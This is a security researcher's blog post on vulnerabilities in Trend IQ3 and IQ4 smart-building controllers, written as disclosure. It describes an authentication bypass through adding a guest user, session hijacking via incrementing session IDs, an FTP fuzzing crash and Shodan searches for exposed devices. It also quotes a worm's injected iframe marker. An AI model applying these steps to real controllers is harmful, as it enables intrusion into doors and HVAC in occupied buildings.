Blog: ICS & SCADA
Smart Building security. Is it any better 10 years on?
Way back in 2006, I was given a Trend IQ3 Building Management System (BMS) controller. My interest was piqued as these devices were being installed in Heathrow’s Terminal 5, according to the manufacturers press releases. The security of the device was a train wreck, yet ‘smart’ buildings are being managed with these devices more than ever.
They manage door access control, heating, ventilation and air conditioning and much more. Remember the Target breach in the US? The ingress point was believed to be the HVAC management system.
I’ve just taken delivery of a used 2013 model of the same controller and a brand new 2017 controller from the same vendor. So, has anything improved?
Here’s the rogues’ gallery: 2006, 2013 & 2017 at the bottom
I did try to disclose responsibly in 2006, but quickly hit a brick wall with the vendor. I presented the findings to GCHQ and the industry at the old CHECKCON conference and the issue also had some coverage in the press.
TL;DR? A short summary:
Little has improved. There is still trivial authentication bypass allowing remote, unauthenticated compromise of smart building controllers and smart buildings, even on the latest models.
Worse, we’ve found these devices on the public internet. We found them in fire stations, military bases, schools, government buildings, businesses and large retailers among many.
We also found some that had already been compromised to a point by malware.
Many of the worst problems are installer issues, though some point to the manufacturer.
The 2006 IQ3 Excite building management controller:
This one is running firmware version 126.96.36.199, here’s a list of what we found:
- Plaintext authentication
- Authentication bypass for embedded web server (see below)
- Reflected XSS on various parameters (reported again in 2013 by Darius Freamon, 7 years after it was first found it: CVE-2013-78004)
- Trivial session hijacking through incremental session IDs (e.g. http://192.168.0.244/modules.htm?param0=22, simply incrementing with every request)
- And a really fun memory leak in to broadcast UDP packets – ‘test1’ was the password set – here we can see it leaking in to packets broadcast on UDP/57612
Trivial fuzzing causes a DoS & possibly a buffer overflow:
When fuzzed over FTP with APPE $P at size 513, the FTP server crashes.
But even more amusingly, $P is then found being broadcast over the network from the controller, which is clearly operating in a very odd state.
There was more, but the point is made…
Manufacturer security advice
Trend Controls, the manufacturer, offers some reasonable advice for installers. They make the point that these devices should be on isolated subnets and NEVER exposed to the internet:
That’s fair, though I don’t think it’s any excuse for not offering even the most basic security. Authentication bypass, XSS and missing SSL? Really?
This advice also assumes that the threat is only from an attacker on the public internet. These controllers are found in quiet areas of buildings, hopefully in locked plant rooms and electrical panels. Ideal for the social engineer. Also, compromise the guy who manages the building, pop his PC and you can potentially unlock doors to order.
Have Trend made any efforts to audit their installers to ensure these devices AREN’T on the internet? It took me less than 10 seconds to find exposed controllers!
IQ3 Excite 2013 model, used
I bought this used from eBay. The firmware version was XXX, so much more recent
IQ412 Excite, latest model, new and unused
www.shodanhq.com couldn’t be better suited to finding these controllers. Installers helpfully name the controllers right at the top of the embedded web server home page:
IMAGE5 (name it “sbs5.png”) <screenshot of controller with maybe M&S?>
Search for IQ3 or IQ4; I got ~1,000 hits without trying hard. Check out some of these:
I have attempted to inform the organisations that I could identify from the headers, with varying responses.
Whilst the XSS could be useful, by far the most interesting security issue was a complete authentication bypass.
This is present if the ‘guest’ user has not been created. It’s weird behaviour, but if the guest account has not been added, anyone can add it.
Looking at the web UI, click ‘modules’ in the top nav bar then look at the options on the left hand margin. If ‘users’ is present, then you can add yourself a new user
And here’s the ‘create new user’ option:
Compromised controllers, serving malware?
Many of these controllers also have FTP enabled, often with simple, default or blank credentials. This is where it got a bit silly:
Whilst clicking through the web UI of a BMS controller, anti-virus popped up. I was starting to wonder if I was looking at a watering hole for security researchers!
However, poking around further, it appears that a number of these controllers have been compromised over FTP by a crypto mining worm: Win32/Crytes
We don’t think that the worm can actually execute on the controller, but it has successfully dropped an infection marker in to the web page covering network config (modules | networks)
A simple GET request shows the following marker appended to the web page:
iframe src=Photo.scr width=1 height=1 frameborder=0
We found the same marker on multiple controllers on the internet. Whilst on this occasion the vendor/installer/clients have dodged a bullet, it would not be difficult to write malware that did successfully infect these controllers.